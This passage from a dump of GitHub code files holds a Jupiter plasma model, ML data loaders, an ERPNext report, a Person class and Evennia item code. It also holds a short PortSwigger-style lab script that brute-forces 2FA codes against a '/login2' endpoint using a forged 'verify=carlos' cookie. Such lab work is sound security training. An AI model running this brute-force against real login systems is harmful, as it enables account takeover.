- 0.12 * np.cos(phi - 3.562)) + \\\n (3.797 - 4.612 * np.cos(phi - 0.825) + 0.606 * np.cos(2 * (phi - 0.473)) +\n 0.847 * np.cos(3 * (phi - 0.913))) * np.exp((-1 * r) / 150)\n return B\n\n\ndef equatorialPlasmaNumberDensity(r, speciesValues=None):\n \"\"\"\n Calculates the plasma density at the equator using the method from Bagenal 2011\n :param r: The radius in R_J\n :param speciesValues:\n :return: The plasma number density at the equator in cm^-3\n \"\"\"\n b2011 = 1987 * (r / 6) ** (-8.2) + 14 * (r / 6) ** (-3.2) + 0.05 * (r / 6) ** (-0.65)\n\n try:\n percentage, a, b, c = speciesValues\n if r <= 15.2:\n n = a * (r / 6) ** b\n else:\n n = (c * b2011)\n except:\n n = b2011\n return n\n\n\ndef equatorialTotalPlasmaNumberDensity(r, species):\n \"\"\"\n Calculates the plasma density at the equator using the method from Bagenal 2011\n :param r: The radius in R_J\n :param species:\n :return: The plasma number density at the equator in cm^-3\n \"\"\"\n b2011 = 1987 * (r / 6) ** (-8.2) + 14 * (r / 6) ** (-3.2) + 0.05 * (r / 6) ** (-0.65)\n n = []\n for i in species:\n percentage, a, b, c = species[i]\n if r <= 15.2:\n n.append(a * (r / 6) ** b)\n else:\n n.append(c * b2011)\n\n totalN = np.sum(n)\n\n return totalN\n\n\ndef averageAmu(r, species, massAmuArray):\n \"\"\"\n\n :param r:\n :param species:\n :param massAmuArray:\n :return:\n \"\"\"\n sumofmasses = 0\n N = []\n for i in massAmuArray:\n mass = massAmuArray[i]\n try:\n n = equatorialPlasmaNumberDensity(r, species[i])\n N.append(n)\n except:\n n = 0\n print('Species do not match')\n sumofmasses += n * mass\n\n amu = sumofmasses/sum(N)\n return amu\n\n\ndef totalMassDensity(r, species, massAmuArray):\n \"\"\"\n\n :param r: radius in R_J\n :param species:\n :param massAmuArray: in AMU\n :return: Mass Density in kg/m^3\n \"\"\"\n M = 0\n for i in massAmuArray:\n mass = massAmuArray[i]\n try:\n n = equatorialPlasmaNumberDensity(r, species[i])\n except:\n n = 0\n print('Species do not match')\n M += n*1e6 * mass*1.67e-27\n\n return M\n\n\ndef alfvenVelocityAtRPhi(r, phi, species, massArray):\n \"\"\"\n\n :param r:\n :param phi:\n :param species:\n :param massArray:\n :return:\n \"\"\"\n\n Va = equatorialMagneticField(r, phi) * 1e-9 / np.sqrt(1.25663706212e-6 * totalMassDensity(r, species, massArray))\n\n return Va\n\n\ndef alfvenVelocityAtRThetaPhi(fieldModel, r, theta, phi, species, massArray, model='VIP4'):\n \"\"\"\n\n :param fieldModel:\n :param r:\n :param theta:\n :param phi:\n :param species:\n :param massArray:\n :param model:\n :return:\n \"\"\"\n\n Va = averageMagFieldModel(fieldModel, r, theta, phi, model) * 1e-9 / np.sqrt(1.25663706212e-6 * totalMassDensity(r, species, massArray))\n\n return Va\n\n\ndef corotationVelocityFunc(x, y):\n \"\"\"\n Calculate the corotational velocity at x and y\n :param x: In R_J\n :param y: In R_J\n :return: The corotation velocity assuming 10 hr rotation period in m/s\n \"\"\"\n v = (2*np.pi/(3600*9.9250)) * np.sqrt(x**2 + y**2) * 71492e3\n return v\n\n\ndef radialScaleHeight(r):\n \"\"\"\n Finds the scale height at a radius\n :param r: Radius in R_J\n :return: Scale height in R_J\n \"\"\"\n h = -0.116 + 2.14*np.log10(r/6) - 2.05*np.log10(r/6)**2 + 0.491*np.log10(r/6)**3 + 0.126*np.log10(r/6)**4\n H = 10 ** h\n return H\n\n\ndef densityAtZFromEquator(z, r, species):\n \"\"\"\n\n :param z:\n :param r:\n :param species:\n :return:\n \"\"\"\n\n nZ = equatorialTotalPlasmaNumberDensity(r, species) * np.exp(-1 * (z / radialScaleHeight(r)) ** 2)\n return nZ\n\n\ndef massDensityAtZFromEquator(r, z, species, massArray):\n \"\"\"\n\n :param z:\n :param r:\n :param species:\n :param massArray:\n :return:\n \"\"\"\n\n mZ = totalMassDensity(r, species, massArray) * np.exp(-1 * (z / radialScaleHeight(r)) ** 2)\n return mZ\n\n\ndef radialVelocityFunc(r, species, massArray):\n \"\"\"\n\n :param r:\n :param species:\n :param massArray:\n :return:\n \"\"\"\n vr = 500/(2 * totalMassDensity(r, species, massArray) *\n radialScaleHeight(r) * np.pi * r * 71492e3 ** 2)\n return vr\n\n\ndef radialVelocityFuncAtZ(r, z, species, massArray):\n \"\"\"\n\n :param r:\n :param species:\n :param massArray:\n :return:\n \"\"\"\n vr = 500/(2 * massDensityAtZFromEquator(r, z, species, massArray) *\n radialScaleHeight(r) * np.pi * r * 71492e3 ** 2)\n return vr\n\n\ndef magnitudeVector(x0, x1, x2):\n \"\"\"\n\n :param x0:\n :param x1:\n :param x2:\n :return:\n \"\"\"\n vector = [x0, x1, x2]\n return np.sqrt((np.square(vector)).sum())\n\n\ndef averageMagFieldModel(fieldObject, r, theta, phi, model='VIP4'):\n \"\"\"\n\n :param fieldObject:\n :param r:\n :param theta:\n :param phi:\n :param model:\n :return:\n \"\"\"\n br, bt, bp, bx, by, bz = fieldObject.Internal_Field(r, theta, phi, False, model)\n b = magnitudeVector(br, bt, bp)\n return b\n\n\n# Create a series of arrays to hold values\nxInRJ = []\nyInRJ = []\nzInRJ = []\nequatorialMagField = []\nnumberDensity = []\nradius = []\nalfvenVelocity = []\nalfvenPointCheck = []\nplasmaZDensity = []\nradiusForZDensity = []\nradialVelocity = []\nradialVelocityAtPi = []\nalfvenVelocityATPi = []\nradialVelocityAtZ = []\nalfvenVelocityAtZ = []\n\n# No longer have to be in the same order\nspeciesList = {'e-': [1, 2451, -6.27, 4.21],\n 'o+': [0.24, 592, -7.36, 0.368],\n 'o++': [0.03, 76.3, -6.73, 0.086],\n 's+': [0.07, 163, -6.81, 0.169],\n 's++': [0.22, 538, -6.74, 0.598],\n 's+++': [0.004, 90.7, -6.21, 0.165],\n 'h+': [0.02, 50.6, -5.31, 0.212],\n 'na+': [0.04, 97.2, -6.75, 0.106],\n 'hoto+': [0.06, 134, -4.63, 1.057]}\nME = 0.00054858\nspeciesMass = {'e-': 0.00054858,\n 'o++': 15.999 - (ME * 2),\n 's+': 32.065 - ME,\n 's++': 32.065 - (ME * 2),\n 's+++': 32.065 - (ME * 3),\n 'h+': 1.00784 - ME,\n 'na+': 22.989769 - ME,\n 'hoto+': 15.999 - (ME * 2),\n 'o+': 15.999 - ME\n }\n\nfieldGenerator = field_models()\n# Calculate radius, scale height, x, y, equatorial magnetic field, Alfven and radial velocity\n# and number density by iterating over radius and angle\nfor r in np.arange(6, 100, 0.5):\n radius.append(r)\n # scaleHeight.append(radialScaleHeight(r)) # No longer needed\n radialVelocityAtPi.append(radialVelocityFunc(r, speciesList, speciesMass))\n alfvenVelocityATPi.append(alfvenVelocityAtRPhi(r, 0, speciesMass, speciesMass))\n for phi in np.arange(0, 2 * np.pi + 0.03, 0.05):\n xInRJ.append(r * np.cos(phi))\n yInRJ.append(r * np.sin(phi))\n equatorialMagField.append(equatorialMagneticField(r, phi))\n numberDensity.append(equatorialTotalPlasmaNumberDensity(r, speciesList))\n radialVelocity.append(radialVelocityFunc(r, speciesList, speciesMass))\n alfvenVelocity.append(alfvenVelocityAtRPhi(r, phi, speciesList, speciesMass))\n\n\n# Check if Alfven velocity is greater than radial, if so set a binary choice to 0\n# will be used to create a plot later\nfor i in range(len(alfvenVelocity)):\n if alfvenVelocity[i] > radialVelocity[i]:\n alfvenPointCheck.append(0)\n else:\n alfvenPointCheck.append(1)\n\nfor r in np.arange(6, 100, 0.5):\n for z in np.arange(-12, 12, 0.1):\n theta = np.arctan2(z, r)\n radiusForZDensity.append(r)\n zInRJ.append(z)\n plasmaZDensity.append(densityAtZFromEquator(z, r, speciesList))\n radialVelocityAtZ.append(radialVelocityFuncAtZ(r, z, speciesList, speciesMass))\n alfvenVelocityAtZ.append(alfvenVelocityAtRThetaPhi(fieldGenerator, r, theta, 0, speciesMass, speciesMass))\n\n\n# Save outputs\nnp.savetxt('alfvenCheck.txt', np.c_[xInRJ, yInRJ, equatorialMagField, numberDensity, alfvenVelocity, radialVelocity,\n alfvenPointCheck], delimiter='\\t', header='x\\ty\\tb\\tp\\tAlfven\\tCorotation\\tCheck')\n# np.savetxt('scaleheighttest.txt', np.c_[radius, scaleHeight], delimiter='\\t', header='r\\tscaleHeight')\n# No longer needed\n\nnp.savetxt('zPlasmaDensity.txt', np.c_[radiusForZDensity, zInRJ, plasmaZDensity, radialVelocityAtZ, alfvenVelocityAtZ], delimiter='\\t', header='r\\tz\\tplasmaZDensity')\n\nnp.savetxt('alfvenradial.txt', np.c_[radius, alfvenVelocityATPi, radialVelocityAtPi], delimiter='\\t', header='r\\tscaleHeight')","repo_name":"jenkins-andrew/Jupiter2DModel","sub_path":"creatingProfiles.py","file_name":"creatingProfiles.py","file_ext":"py","file_size_in_byte":9007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"18357650762","text":"import requests\nfrom requests_toolbelt.utils import dump\nimport sys\n\n# 2fa_broken_logic_v1 is 'better' version because of fix (not allowing redirections)\n\nurl = ''\nsession_key = ''\n# not sure if this is correct approach but it worked\npath= '/login2'\n\nPROXIES = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\nHEADERS = {'Host': url,\n 'Cookie':'session='+session_key+'; verify=carlos',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',\n 'Accept-Language': 'en-US,en;q=0.5',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Content-Type': 'application/x-www-form-urlencoded',\n 'Referer': url+path,\n 'Origin': url,\n 'Upgrade-Insecure-Requests': '1',\n 'Sec-Fetch-Dest': 'document',\n 'Sec-Fetch-Mode': 'navigate',\n 'Sec-Fetch-Site': 'same-origin'} \n\n\ndef logging_hook(response, *args, **kwargs):\n data = dump.dump_response(response)\n print(data.decode('utf-8'))\n \n\n\nhttp = requests.Session()\n# http.hooks[\"response\"] = [logging_hook]\n\n\ni = 0\nfor i in range(1000):\n r = http.post('https://'+url+path,headers=HEADERS, data='mfa-code='+str('{0:04}'.format(i)))\n sys.stdout.write('\\r'+str('{0:04}'.format(i)))\n sys.stdout.flush()\n# i was able to get 2fa code this way, not sure why in v1 using r.status_code or r.is_redirect or r.is_permanent_redirect did not confirm 302\n# fixed in v1, request returns status code from url user is redirected to\n\n if 'HTTP/1.1 302 Found' in dump.dump_all(r).decode('utf-8'):\n print(f' 2fa code is = {i}')\n break\n ","repo_name":"Kliprmimo/portswigger","sub_path":"2fa_broken_logic_v2.py","file_name":"2fa_broken_logic_v2.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"33674550993","text":"import os\nimport uuid\n\n\nclass Person:\n\n def __init__(self, name, age, sex='M'):\n self.__name = name\n\n if not isinstance(age, int):\n raise ValueError(f\"invalid int for age: '{age}'\")\n elif age > 0:\n self.__age = age\n else:\n self.__age = 0\n\n self.__sex = sex\n self.__uuid = str(uuid.uuid4())\n\n def get_name(self):\n \"\"\"\n Getter Name\n :return: name of person\n :rtype: str\n \"\"\"\n return self.__name\n\n def set_name(self, value):\n \"\"\"\n Setter name\n :param value: name of person\n :type value: str\n :return: None\n :rtype: NoneType\n \"\"\"\n self.__name = value\n\n def get_age(self):\n \"\"\"\n Getter age\n :return: age of person\n :rtype: int\n \"\"\"\n return self.__age\n\n def set_age(self, value):\n \"\"\"\n Setter age\n :param value: age of person\n :type value: int\n :return: None\n :rtype: NoneType\n \"\"\"\n if not isinstance(value, int):\n raise ValueError(f\"invalid int for age: '{value}'\")\n elif value > 0:\n self.__age = value\n else:\n self.__age = 0\n\n def get_sex(self):\n \"\"\"\n Getter gender\n :return: gender of person\n :rtype: str\n \"\"\"\n return self.__sex\n\n def set_sex(self, value):\n \"\"\"\n Setter gender\n :param value: gender of person ('M', 'F', 'N')\n :type value: str\n :return: None\n :rtype: NoneType\n \"\"\"\n self.__sex = value\n\n def get_uuid(self):\n \"\"\"\n Getter uuid\n :return:UUID value\n :rtype: str\n \"\"\"\n return self.__uuid\n\n def __str__(self):\n \"\"\"\n String representation\n :return: human readable representation\n :rtype: str\n \"\"\"\n __str = 'Person: '\n __str += str(self.__name) + ', '\n __str += str(self.__age) + ', '\n __str += str(self.__sex) + ', '\n __str += str(self.__uuid)\n return __str\n\n def __repr__(self):\n \"\"\"\n repr() string representation\n :return: programmtic representation\n :rtype: str\n \"\"\"\n __str = \"{\"\n __str += f\"'name': {self.__name}, \"\n __str += f\"'age': {self.__age}, \"\n __str += f\"'sex': {self.__sex}, \"\n __str += f\"'uuid': {self.__uuid}\"\n __str += \"}\"\n return __str\n\n # Python attributes requires, property(fget=None, fset=None, fdel=None, doc=None)\n name = property(get_name, set_name, None, None)\n age = property(get_age, set_age, None, None)\n sex = property(get_sex, set_sex, None, None)\n uuid = property(get_uuid, None, None, None)\n","repo_name":"sjfke/python-projects","sub_path":"Person.py","file_name":"Person.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"5315088884","text":"import os\nimport math\nimport time\nimport random\nimport numpy as np\nimport pickle as pkl\nfrom utils.savedir import *\n\nimport torch\nimport keras\nimport tensorflow as tf\nfrom keras import backend as K\nfrom keras.datasets import mnist, fashion_mnist\nfrom sklearn.datasets import make_moons\nfrom pandas import DataFrame\nfrom torch.utils.data import DataLoader\n\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.nn.functional as F\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\ndef execution_time(start, end):\n hours, rem = divmod(end - start, 3600)\n minutes, seconds = divmod(rem, 60)\n print(\"\\nExecution time = {:0>2}:{:0>2}:{:0>2}\".format(int(hours), int(minutes), int(seconds)))\n\n\n################\n# data loaders #\n################\n\ndef data_loaders(dataset_name, batch_size, n_inputs=None, channels=\"first\", shuffle=False):\n random.seed(0)\n # batch_size = 256\n\n if dataset_name == \"cifar\":\n\n data_dir=\"../../cifar-10/\"\n\n transform_train = transforms.Compose([\n # transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ])\n\n transform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ])\n\n target_transform = torchvision.transforms.Compose([lambda x:torch.tensor([x]), \n lambda x:F.one_hot(x,10),\n lambda x:x.squeeze()])\n\n trainset = torchvision.datasets.CIFAR10(root=data_dir, train=True, download=True, transform=transform_train,\n target_transform=target_transform)\n trainset = torch.utils.data.Subset(trainset, range(0, n_inputs)) if n_inputs else trainset\n train_loader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True)\n\n testset = torchvision.datasets.CIFAR10(root=data_dir, train=False, download=True, transform=transform_test,\n target_transform=target_transform)\n testset = torch.utils.data.Subset(testset, range(0, n_inputs)) if n_inputs else testset\n test_loader = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=False)\n\n input_shape = next(iter(train_loader))[0].shape[1:]\n # print(next(iter(train_loader))[0].shape)\n # print(next(iter(train_loader))[1].shape)\n num_classes = 10\n else:\n\n x_train, y_train, x_test, y_test, input_shape, num_classes = \\\n load_dataset(dataset_name=dataset_name, n_inputs=n_inputs, channels=channels)\n\n train_loader = DataLoader(dataset=list(zip(x_train, y_train)), batch_size=batch_size, \n shuffle=shuffle)\n test_loader = DataLoader(dataset=list(zip(x_test, y_test)), batch_size=batch_size, \n shuffle=shuffle)\n\n return train_loader, test_loader, input_shape, num_classes\n\ndef classwise_data_loaders(dataset_name, batch_size, n_inputs=None, shuffle=False):\n random.seed(0)\n x_train, y_train, x_test, y_test, input_shape, num_classes = \\\n load_dataset(dataset_name=dataset_name)\n\n train_loaders = []\n test_loaders = []\n\n for label in range(num_classes):\n label_idxs = y_train.argmax(1)==label\n x_train_label = x_train[label_idxs]\n y_train_label = y_train[label_idxs]\n\n label_idxs = y_test.argmax(1)==label\n x_test_label = x_test[label_idxs]\n y_test_label = y_test[label_idxs]\n\n if n_inputs:\n x_train_label = x_train_label[:n_inputs]\n y_train_label = y_train_label[:n_inputs]\n x_test_label = x_test_label[:n_inputs]\n y_test_label = y_test_label[:n_inputs]\n\n train_loader = DataLoader(dataset=list(zip(x_train_label, y_train_label)), \n batch_size=batch_size, shuffle=shuffle)\n test_loader = DataLoader(dataset=list(zip(x_test_label, y_test_label)), \n batch_size=batch_size, shuffle=shuffle)\n\n train_loaders.append(train_loader)\n test_loaders.append(test_loader)\n\n return train_loaders, test_loaders, input_shape, num_classes\n\n\ndef load_half_moons(channels=\"first\", n_samples=30000):\n x, y = make_moons(n_samples=n_samples, shuffle=False, noise=0.1, random_state=0)\n x, y = (x.astype('float32'), y.astype('float32'))\n x = (x-np.min(x))/(np.max(x)-np.min(x))\n\n # train-test split\n split_size = int(0.8 * len(x))\n x_train, y_train = x[:split_size], y[:split_size]\n x_test, y_test = x[split_size:], y[split_size:]\n\n # image-like representation for compatibility with old code\n n_channels = 1\n n_coords = 2\n if channels == \"first\":\n x_train = x_train.reshape(x_train.shape[0], n_channels, n_coords, 1)\n x_test = x_test.reshape(x_test.shape[0], n_channels, n_coords, 1)\n\n elif channels == \"last\":\n x_train = x_train.reshape(x_train.shape[0], 1, n_coords, n_channels)\n x_test = x_test.reshape(x_test.shape[0], 1, n_coords, n_channels)\n input_shape = x_train.shape[1:]\n\n # binary one hot encoding\n num_classes = 2\n y_train = keras.utils.to_categorical(y_train, num_classes)\n y_test = keras.utils.to_categorical(y_test, num_classes)\n return x_train, y_train, x_test, y_test, input_shape, num_classes\n\n\ndef load_fashion_mnist(channels, img_rows=28, img_cols=28):\n print(\"\\nLoading fashion mnist.\")\n\n (x_train, y_train), (x_test, y_test) = fashion_mnist.load_data()\n\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n x_train /= 255\n x_test /= 255\n\n y_train = keras.utils.to_categorical(y_train, 10)\n y_test = keras.utils.to_categorical(y_test, 10)\n\n if channels == \"first\":\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\n\n elif channels == \"last\":\n x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n \n input_shape = x_train.shape[1:]\n num_classes = 10\n return x_train, y_train, x_test, y_test, input_shape, num_classes\n\n\ndef load_mnist(channels, img_rows=28, img_cols=28):\n\n print(\"\\nLoading mnist.\")\n\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n x_train /= 255\n x_test /= 255\n\n y_train = keras.utils.to_categorical(y_train, 10)\n y_test = keras.utils.to_categorical(y_test, 10)\n\n if channels == \"first\":\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\n\n elif channels == \"last\":\n x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n \n input_shape = x_train.shape[1:]\n num_classes = 10\n return x_train, y_train, x_test, y_test, input_shape, num_classes\n\ndef labels_to_onehot(integer_labels, n_classes=None):\n n_rows = len(integer_labels)\n n_cols = n_classes if n_classes else integer_labels.max() + 1 \n onehot = np.zeros((n_rows, n_cols), dtype='uint8')\n onehot[np.arange(n_rows), integer_labels] = 1\n return onehot\n\ndef onehot_to_labels(y):\n if type(y) is np.ndarray:\n return np.argmax(y, axis=1)\n elif type(y) is torch.Tensor:\n return torch.max(y, 1)[1]\n\n# def load_cifar(channels, img_rows=32, img_cols=32):\n# x_train = None\n# y_train = []\n\n# data_dir=\"../../cifar-10/\"\n\n# for batch in range(1, 6):\n# data_dic = unpickle(data_dir + \"data_batch_{}\".format(batch))\n# if batch == 1:\n# x_train = data_dic['data']\n# else:\n# x_train = np.vstack((x_train, data_dic['data']))\n# y_train += data_dic['labels']\n\n# test_data_dic = unpickle(data_dir + \"test_batch\")\n# x_test = test_data_dic['data']\n# y_test = test_data_dic['labels']\n\n# x_train = x_train.reshape((len(x_train), 3, img_rows, img_cols))\n# x_train = np.rollaxis(x_train, 1, 4)\n# y_train = np.array(y_train)\n\n# x_test = x_test.reshape((len(x_test), 3, img_rows, img_cols))\n# x_test = np.rollaxis(x_test, 1, 4)\n# y_test = np.array(y_test)\n\n# input_shape = x_train.shape[1:]\n\n# x_train = x_train.astype('float32')\n# x_test = x_test.astype('float32')\n# x_train /= 255\n# x_test /= 255\n\n# if channels == \"first\":\n# x_train = x_train.reshape(x_train.shape[0], 3, img_rows, img_cols)\n# x_test = x_test.reshape(x_test.shape[0], 3, img_rows, img_cols)\n\n# elif channels == \"last\":\n# x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 3)\n# x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 3)\n\n# y_train = keras.utils.to_categorical(y_train, 10)\n# y_test = keras.utils.to_categorical(y_test, 10)\n\n# input_shape = x_train.shape[1:]\n# num_classes = 10\n# return x_train, y_train, x_test, y_test, input_shape, num_classes\n\ndef load_dataset(dataset_name, n_inputs=None, channels=\"first\", shuffle=False):\n\n if dataset_name == \"mnist\":\n x_train, y_train, x_test, y_test, input_shape, num_classes = load_mnist(channels)\n # elif dataset_name == \"cifar\":\n # x_train, y_train, x_test, y_test, input_shape, num_classes = load_cifar(channels)\n elif dataset_name == \"fashion_mnist\":\n x_train, y_train, x_test, y_test, input_shape, num_classes = load_fashion_mnist(channels)\n elif dataset_name == \"half_moons\":\n x_train, y_train, x_test, y_test, input_shape, num_classes = load_half_moons()\n else:\n raise AssertionError(\"\\nDataset not available.\")\n\n x_train, y_train = torch.from_numpy(x_train), torch.from_numpy(y_train)\n x_test, y_test = torch.from_numpy(x_test), torch.from_numpy(y_test)\n\n if n_inputs:\n x_train, y_train, _ = balanced_subset(x_train, y_train, num_classes, n_inputs)\n x_test, y_test, _ = balanced_subset(x_test, y_test, num_classes, n_inputs)\n\n print('x_train shape =', x_train.shape, '\\nx_test shape =', x_test.shape)\n print('y_train shape =', y_train.shape, '\\ny_test shape =', y_test.shape)\n\n if shuffle is True:\n idxs = np.random.permutation(len(x_train))\n x_train, y_train = (x_train[idxs], y_train[idxs])\n idxs = np.random.permutation(len(x_test))\n x_test, y_test = (x_test[idxs], y_test[idxs])\n\n return x_train, y_train, x_test, y_test, input_shape, num_classes\n\ndef balanced_subset(inputs, labels, num_classes, subset_size):\n\n n_samples = min(subset_size, len(inputs))\n samples_per_class = int(n_samples/num_classes)\n\n sampled_idxs = []\n for target in range(num_classes+1):\n\n while len(sampled_idxs) < target*samples_per_class:\n idx = np.random.randint(0, len(inputs))\n\n if labels[idx].argmax(-1)==(target-1):\n sampled_idxs.append(idx)\n\n return inputs[sampled_idxs], labels[sampled_idxs], sampled_idxs\n\n############\n# pickling #\n############\n\n\ndef save_to_pickle(data, path, filename):\n\n full_path=os.path.join(path, filename+\".pkl\")\n print(\"\\nSaving pickle: \", full_path)\n # os.makedirs(os.path.dirname(path), exist_ok=True)\n os.makedirs(path, exist_ok=True)\n with open(full_path, 'wb') as f:\n pkl.dump(data, f)\n\ndef load_from_pickle(path, filename):\n\n full_path=os.path.join(path, filename+\".pkl\")\n print(\"\\nLoading from pickle: \", full_path)\n with open(full_path, 'rb') as f:\n u = pkl._Unpickler(f)\n u.encoding = 'latin1'\n data = u.load()\n\n return data\n \ndef unpickle(file):\n \"\"\" Load byte data from file\"\"\"\n with open(file, 'rb') as f:\n data = pkl.load(f, encoding='latin-1')\n return data\n\ndef plot_loss_accuracy(dict, path):\n fig, (ax1, ax2) = plt.subplots(2, figsize=(12,8))\n ax1.plot(dict['loss'])\n ax1.set_title(\"loss\")\n ax2.plot(dict['accuracy'])\n ax2.set_title(\"accuracy\")\n os.makedirs(os.path.dirname(path), exist_ok=True)\n fig.savefig(path)","repo_name":"ginevracoal/BayesianRelevance","sub_path":"src/utils/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":12410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"14055294229","text":"import frappe\nfrom frappe import _\n\n\ndef execute(filters=None):\n return get_columns(filters), get_data(filters)\n\n\ndef get_data(filters):\n\n conditions = get_conditions(filters)\n data = frappe.db.sql(\n \"\"\"\n\t\tselect\n\t\t\ttso.name, tso.customer_name , tso.customer_group , tcic.model, tsoi.item_name , tso.transaction_date , \n\t\t\ttsoi.delivery_date , tso.branch_cf , tu.full_name \n\t\tfrom `tabSales Order` tso \n\t\tleft outer join `tabCar Information CT` tcic on tcic.parent = tso.name \n\t\tinner join `tabSales Order Item` tsoi on tsoi.parent = tso.name \n\t\tinner join tabUser tu on tu.name = tso.owner \n\t\t\t\t{conditions}\n\t\torder by tso.name, tsoi.delivery_date\n \"\"\".format(conditions=conditions), filters)\n\n return data\n\n\ndef get_columns(filters):\n columns = [\n {\n \"label\": _(\"Sales order\"),\n \"fieldtype\": \"Link\",\n \"fieldname\": \"name\",\n \"options\": \"Sales Order\",\n \"width\": 200\n },\n {\n \"label\": _(\"Customer\"),\n \"fieldtype\": \"Link\",\n \"fieldname\": \"customer_name\",\n \"options\": \"Customer\",\n \"width\": 220\n },\n {\n \"label\": _(\"Customer Group\"),\n \"fieldname\": \"customer_group\",\n \"width\": 220\n },\n {\n \"label\": _(\"Model\"),\n \"fieldname\": \"model\",\n \"width\": 220\n },\n {\n \"label\": _(\"Item Name\"),\n \"fieldname\": \"item_name\",\n \"width\": 220\n },\n {\n \"label\": _(\"Transaction Date\"),\n \"fieldtype\": \"Date\",\n \"fieldname\": \"transaction_date\",\n \"width\": 140\n },\n {\n \"label\": _(\"Delivery Date\"),\n \"fieldtype\": \"Date\",\n \"fieldname\": \"delivery_date\",\n \"width\": 120\n },\n {\n \"label\": _(\"Branch\"),\n \"fieldtype\": \"Link\",\n \"fieldname\": \"branch_cf\",\n \"options\": \"Branch\",\n \"width\": 150\n },\n {\n \"label\": _(\"Created By\"),\n \"fieldname\": \"owner\",\n \"width\": 120\n },\n ]\n\n return columns\n\n\ndef get_conditions(filters):\n conditions = []\n\n if filters.from_date:\n conditions.append(\"tso.delivery_date >= %(from_date)s\")\n if filters.to_date:\n conditions.append(\"tso.delivery_date <= %(to_date)s\")\n\n if filters.branch:\n conditions.append(\"tso.branch_cf <= %(branch)s\")\n if filters.owner:\n conditions.append(\"tso.owner = %(owner)s\")\n\n return conditions and \" where \" + \" and \".join(conditions) or \"\"\n","repo_name":"ashish-greycube/armor","sub_path":"armor/armor/report/armor_booking/armor_booking.py","file_name":"armor_booking.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"31582188291","text":"from evennia import create_object, DefaultObject\nimport evennia.contrib.clothing\nfrom evennia import default_cmds\nimport random\nimport markovify\nfrom django.conf import settings\n\n\n\nclass Item(DefaultObject):\n \n def getSubstance(self):\n substanceFO = open(\"typeclasses/itemator/word_lists/substances.txt\")\n substanceList = list(substanceFO)\n selection = random.randint(0, len(substanceList) - 1)\n substance = substanceList[selection]\n substance = substance.rstrip(\"\\n\")\n return substance\n\n def getAdjective(self):\n adjectiveFO = open(\"typeclasses/itemator/word_lists/adjectives.txt\")\n adjectiveList = list(adjectiveFO)\n selection = random.randint(0, len(adjectiveList) - 1)\n adjective = adjectiveList[selection]\n adjective = adjective.rstrip(\"\\n\")\n return adjective\n\n def getColor(self):\n colorsFO = open(\"typeclasses/itemator/word_lists/colors.txt\")\n colorsList = list(colorsFO)\n colorsSelection = random.randint(0, len(colorsList) - 1)\n color = colorsList[colorsSelection]\n color = color.rstrip(\"\\n\")\n colorsFO.close()\n return color\n\n def getSkill(self):\n skillsFO = open(\"typeclasses/itemator/word_lists/skills.txt\")\n skillsList = list(skillsFO)\n selection = random.randint(0, len(skillsList) - 1)\n skill = skillsList[selection]\n skill = skill.rstrip(\"\\n\")\n return skill\n \n def getArtwork(self):\n artworksFO = open(\"typeclasses/itemator/word_lists/artworks.txt\")\n artworksList = list(artworksFO)\n selection = random.randint(0, len(artworksList) - 1)\n artwork = artworksList[selection]\n artwork = artwork.rstrip(\"\\n\")\n return artwork\n\n def getTheme(self):\n themesFO = open(\"typeclasses/itemator/word_lists/epicThemes.txt\")\n themesList = list(themesFO)\n themesSelection = random.randint(0, len(themesList) - 1)\n theme = themesList[themesSelection]\n theme = theme.rstrip(\"\\n\")\n themesFO.close()\n return theme\n\n def getVerb(self):\n verbsFO = open(\"typeclasses/itemator/word_lists/artSpeakVerbs.txt\")\n verbsList = list(verbsFO)\n verbsSelection = random.randint(0, len(verbsList) - 1)\n verb = verbsList[verbsSelection]\n verb = verb.rstrip(\"\\n\")\n verbsFO.close()\n return verb\n \n def getTitle(self):\n titlesFO = open(\"typeclasses/itemator/word_lists/artTitles.txt\")\n titlesList = list(titlesFO)\n titlesSelection = random.randint(0, len(titlesList) - 1)\n title = titlesList[titlesSelection]\n title = title.rstrip(\"\\n\")\n title = title.title()\n titlesFO.close()\n return title\n \n def getTitleTwo(self):\n titlesTwoFO = open(\"typeclasses/itemator/word_lists/artTitles2.txt\")\n titlesTwoList = list(titlesTwoFO)\n titlesTwoSelection = random.randint(0, len(titlesTwoList) - 1)\n 